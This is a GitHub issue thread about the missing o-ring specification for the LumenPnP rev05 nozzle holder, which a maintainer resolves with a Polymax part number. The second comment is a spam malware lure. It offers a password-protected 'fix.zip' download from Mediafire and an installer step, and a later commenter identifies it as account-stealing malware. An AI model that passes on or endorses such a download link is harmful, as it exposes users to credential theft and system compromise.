### ISSUE TITLE
Nozzle design o-ring specification

### ISSUE THREAD

**Issue by asm308** [opulo-inc/lumenpnp#731]
# Version Number
looking at the rev05 branch

#Description
I was looking at the drawings for the nozzle holders but I don't see anything that provides a specification of the o-ring required.

Am I missing something or is this missing from the drawings 

Thanks

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by lucian151** [comment]
Hi @asm308, thanks for the note. For now you can reference the following information and I'll update the source to be more helpful on this later.
VENDOR | PART NUMBER | BUY UNITS | COMMENT |  
-- | -- | -- | -- | --
Polymax Ltd | 4X0.6N70 | each | https://www.polymax.co.uk/o-ring-4mm-id-x-0-6mm-cs-nitrile-70-sha

**Comment by asm308** [comment]
Thanks Lucian. Much appreciated
